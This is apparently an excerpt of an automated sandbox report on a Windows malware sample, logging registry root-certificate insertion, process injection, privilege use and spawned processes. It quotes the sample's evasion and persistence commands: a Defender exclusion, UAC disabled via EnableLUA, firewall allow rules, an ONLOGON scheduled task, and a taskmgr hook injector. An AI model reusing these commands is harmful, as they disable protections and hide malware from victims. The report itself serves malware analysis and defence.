992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u8k.0.exe N/A
N/A N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
N/A N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
N/A N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
N/A N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
N/A N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
N/A N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
N/A N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
N/A N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
N/A N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
N/A N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
N/A N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
N/A N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
N/A N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
N/A N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2872 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2872 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\system32\WerFault.exe
PID 2872 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\system32\WerFault.exe
PID 2872 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\system32\WerFault.exe
PID 2512 wrote to memory of 308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe
PID 2512 wrote to memory of 308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe
PID 2512 wrote to memory of 308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe
PID 2512 wrote to memory of 308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe
PID 2512 wrote to memory of 1952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe
PID 2512 wrote to memory of 1952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe
PID 2512 wrote to memory of 1952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe
PID 2512 wrote to memory of 1952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe
PID 2512 wrote to memory of 2856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe
PID 2512 wrote to memory of 2856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe
PID 2512 wrote to memory of 2856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe
PID 2512 wrote to memory of 2856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe
PID 2512 wrote to memory of 2040 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe
PID 2512 wrote to memory of 2040 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe
PID 2512 wrote to memory of 2040 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe
PID 2512 wrote to memory of 2040 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe
PID 2512 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe
PID 2512 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe
PID 2512 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe
PID 2512 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe
PID 308 wrote to memory of 808 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.0.exe
PID 308 wrote to memory of 808 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.0.exe
PID 308 wrote to memory of 808 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.0.exe
PID 308 wrote to memory of 808 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.0.exe
PID 308 wrote to memory of 1748 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.1.exe
PID 308 wrote to memory of 1748 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.1.exe
PID 308 wrote to memory of 1748 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.1.exe
PID 308 wrote to memory of 1748 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.1.exe
PID 1044 wrote to memory of 2028 N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe C:\Windows\system32\cmd.exe
PID 1044 wrote to memory of 2028 N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe C:\Windows\system32\cmd.exe
PID 1044 wrote to memory of 2028 N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe C:\Windows\system32\cmd.exe
PID 1044 wrote to memory of 2028 N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe C:\Windows\system32\cmd.exe
PID 2028 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2028 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2028 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 664 wrote to memory of 2748 N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe C:\Windows\system32\cmd.exe
PID 664 wrote to memory of 2748 N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe C:\Windows\system32\cmd.exe
PID 664 wrote to memory of 2748 N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe C:\Windows\system32\cmd.exe
PID 664 wrote to memory of 2748 N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe C:\Windows\system32\cmd.exe
PID 2748 wrote to memory of 1832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2748 wrote to memory of 1832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2748 wrote to memory of 1832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 532 wrote to memory of 1632 N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe C:\Windows\system32\cmd.exe
PID 532 wrote to memory of 1632 N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe C:\Windows\system32\cmd.exe
PID 532 wrote to memory of 1632 N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe C:\Windows\system32\cmd.exe
PID 532 wrote to memory of 1632 N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe C:\Windows\system32\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe

"C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2872 -s 668

C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe

"C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe"

C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe

"C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe"

C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe

"C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe"

C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe

"C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe"

C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe

"C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240510082806.log C:\Windows\Logs\CBS\CbsPersist_20240510082806.cab

C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe

"C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe"

C:\Users\Admin\AppData\Local\Temp\u8k.0.exe

"C:\Users\Admin\AppData\Local\Temp\u8k.0.exe"

C:\Users\Admin\AppData\Local\Temp\u8k.1.exe

"C:\Users\Admin\AppData\Local\Temp\u8k.1.exe"

C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe

"C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe"

C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe

"C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe"

C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe

"C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

